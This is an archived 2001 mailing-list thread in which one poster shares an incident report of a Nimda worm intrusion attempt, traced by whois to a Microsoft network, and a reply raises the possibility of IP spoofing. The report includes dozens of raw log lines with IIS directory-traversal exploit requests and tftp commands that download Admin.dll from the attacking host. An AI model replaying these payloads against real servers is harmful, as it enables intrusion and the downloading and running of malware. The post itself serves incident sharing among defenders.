Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Microsoft's Early Xmas Present.

From: "mcoleman" <mcoleman () uniontown com>
Date: Sun, 30 Dec 2001 02:05:43 -0500
Hi Jay,

     These logs you included appear to be logs from the web server itself,
correct?  Or, are these logs from something else that formats them this way?

     If these are the actual web server logs, then my point might be
somewhat moot, but it could be trivial to fake M$'s source IP address in a
GET request to possibly trick your early bird software to give you and M$ a
holiday assache.

     If these are logs from the web server itself, then the 3-way handshake
must have happened and that is really hard to spoof source IP without
predictable sequence numbers, maybe someone spoofing directly upstream from
you?  If you don't have stateful protection on your firewall and your
earlybird software just sniffs signatures off of the wire like Snort does,
then someone could generate SYNed/ACKed packets (to get past Established
Filters) containing Nimda GET requests using whatever source IP they wanted,
and could maybe trick a "signature sniffing" reporting system, and your web
server would just ignore them...?

    Then, there's always the possibility that M$ got infected, but you have
to consider all angles.  Far be it for me to defend M$, but you have to keep
an open mind about everything these days.  I don't believe anything unless
it is proven.  Completion of a 3-way handshake would be strong evidence for
me though.

     On a whim, I would consider looking up www.whitehouse.gov and see if
the earlybird saw and reported attacks from that network as well, as this
would likely be another target that a trickster would use to try to embarass
you.

     That early bird software is a great idea, but I see it easily abused
unless strong precautions are in place.  I am sorry I am not familiar with
that software, it may be much deeper than I am giving it credit for, I just
thought it important to throw this possibility to you tonight in case that
is what is happening.  Good luck.. please let us know the outcome of this.

-Mark Coleman


-----Original Message-----
From: Jay D. Dyson <jdyson () treachery net>
To: Incidents List <incidents () securityfocus com>
Date: Saturday, December 29, 2001 11:27 PM
Subject: Microsoft's Early Xmas Present.



-----BEGIN PGP SIGNED MESSAGE-----

Hi folks,

Normally I wouldn't be sending this out, but I figure folks need
to be aware and wary, considering the origin of this intrusion attempt.

I received an early Xmas present from Microsoft.  No, I didn't get
XP, nor did I get the latest Office software suite.

I got a Nimda intrusion attempt.

Early Bird[1] picked up on this intrusion attempt and immediately
notified Microsoft.  I've yet to hear back from Microsoft as to why this
attack from their network came to pass[2].

For those who are interested, here's the log excerpt.

208.229.100.126 - - [24/Dec/2001:19:34:36 -0800] "GET

/scripts/root.exe?/c+dir HTTP/1.0" 200 367 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:34:46 -0800] "GET

/scripts/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.d
ll HTTP/1.0" 200 421 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:34:56 -0800] "GET /scripts/Admin.dll

HTTP/1.0" 200 361 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:35:06 -0800] "GET

/MSADC/root.exe?/c+dir HTTP/1.0" 200 365 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:35:17 -0800] "GET

/MSADC/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll
HTTP/1.0" 200 419 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:35:27 -0800] "GET /MSADC/Admin.dll

HTTP/1.0" 200 359 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:35:37 -0800] "GET

/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:35:51 -0800] "GET

/c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%2
0c:\Admin.dll HTTP/1.0" 200 432 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:36:07 -0800] "GET

/c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%2
0d:\Admin.dll HTTP/1.0" 200 432 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:36:18 -0800] "GET

/c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%2
0e:\Admin.dll HTTP/1.0" 200 432 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:36:28 -0800] "GET /c/Admin.dll

HTTP/1.0" 200 355 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:36:38 -0800] "GET

/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:36:49 -0800] "GET

/d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%2
0c:\Admin.dll HTTP/1.0" 200 432 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:36:59 -0800] "GET

/d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%2
0d:\Admin.dll HTTP/1.0" 200 432 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:37:09 -0800] "GET

/d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%2
0e:\Admin.dll HTTP/1.0" 200 432 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:37:23 -0800] "GET /d/Admin.dll

HTTP/1.0" 200 355 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:37:39 -0800] "GET

/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:37:54 -0800] "GET

/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20G
ET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:38:10 -0800] "GET

/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20G
ET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:38:24 -0800] "GET

/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20G
ET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:38:35 -0800] "GET

/scripts/..%255c../Admin.dll HTTP/1.0" 200 371 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:38:45 -0800] "GET

/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 200 412 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:39:00 -0800] "GET

/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:39:11 -0800] "GET

/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:39:25 -0800] "GET

/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:39:40 -0800] "GET

/_vti_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:39:51 -0800] "GET

/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 200 412 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:40:06 -0800] "GET

/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:40:17 -0800] "GET

/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:40:31 -0800] "GET

/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:40:46 -0800] "GET

/_mem_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:40:57 -0800] "GET

/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 200 440 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:41:12 -0800] "GET

/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.d
ll HTTP/1.0" 200 497 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:41:23 -0800] "GET

/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.d
ll HTTP/1.0" 200 497 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:41:37 -0800] "GET

/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.d
ll HTTP/1.0" 200 497 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:41:52 -0800] "GET

/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../Admin.dl
l HTTP/1.0" 200 420 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:42:03 -0800] "GET

/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:42:18 -0800] "GET

/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20
GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:42:29 -0800] "GET

/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20
GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:42:43 -0800] "GET

/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20
GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:42:58 -0800] "GET

/scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 372 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET

/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET

/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"

208.229.100.126 - - [24/Dec/2001:19:43:19 -0800] "GET

/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20
GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:43:29 -0800] "GET

/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20
GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:43:40 -0800] "GET

/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20
GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:43:50 -0800] "GET

/scripts/..%c0%af../Admin.dll HTTP/1.0" 200 372 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:44:09 -0800] "GET

/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:44:20 -0800] "GET

/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20
GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:44:31 -0800] "GET

/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20
GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:44:41 -0800] "GET

/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20
GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:44:51 -0800] "GET

/scripts/..%c1%9c../Admin.dll HTTP/1.0" 200 372 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:45:01 -0800] "GET

/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET

/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET

/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 395 "-"
"-"

208.229.100.126 - - [24/Dec/2001:19:45:12 -0800] "GET

/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126
%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 452 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:45:23 -0800] "GET

/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126
%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 452 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:45:33 -0800] "GET

/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126
%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 452 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:45:43 -0800] "GET

/scripts/..%25%35%63../Admin.dll HTTP/1.0" 200 375 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:45:57 -0800] "GET

/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:46:13 -0800] "GET

/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20G
ET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:46:28 -0800] "GET

/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20G
ET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:46:44 -0800] "GET

/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20G
ET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"

208.229.100.126 - - [24/Dec/2001:19:46:58 -0800] "GET

/scripts/..%252f../Admin.dll HTTP/1.0" 200 371 "-" "-"


$ whois -h whois.arin.net 208.229.100.126

Microsoft Labs (NETBLK-UU-208-229-100-D1)
  One Microsoft Way
  Redmond, WA 98052
  US

  Netname: UU-208-229-100-D1
  Netblock: 208.229.100.0 - 208.229.101.255

  Coordinator:
     Steig, Rick  (RS8676-ARIN)  a-rickst () MICROSOFT COM
     (425) 703-3061

  Record last updated on 03-Nov-1997.
  Database last updated on  27-Dec-2001 19:55:32 EDT.

- -Jay

1. http://www.treachery.net/earlybird/
2. If anyone from Microsoft is reading this, I'd appreciate something
more pleasant next holiday season.  (FYI, the machine you hit ran
XP for only 15 seconds.  It now runs Linux.)

  (    (                                                        _______
  ))   ))   .-"There's always time for a good cup of coffee"-.   >====<--.
C|~~|C|~~| (>----- Jay D. Dyson -- jdyson () treachery net -----<) |    = |-'
 `--' `--'  `---------- Si vis pacem, para bellum. ----------'  `------'

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.

iQCVAwUBPC0YPrlDRyqRQ2a9AQFXDAQAoXxjVbh6fTzpUPyQFB8aJGpxOLg/+Om+
1Zck8Fw7/tfKsq97YLSqSsp2r4Q5+ybQqXxdnbLVgVsPhKhazzXNrcPKWXhYQU8q
BYT1edg658tvKND0I5NeWoU+vzqzR0NPtppmBKCEMlwz+zG2Nz3nTzT7jMpzmxPo
uNDtpRKBcGs=
=9DpW
-----END PGP SIGNATURE-----


---------------------------------------------------------------------------

-

This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: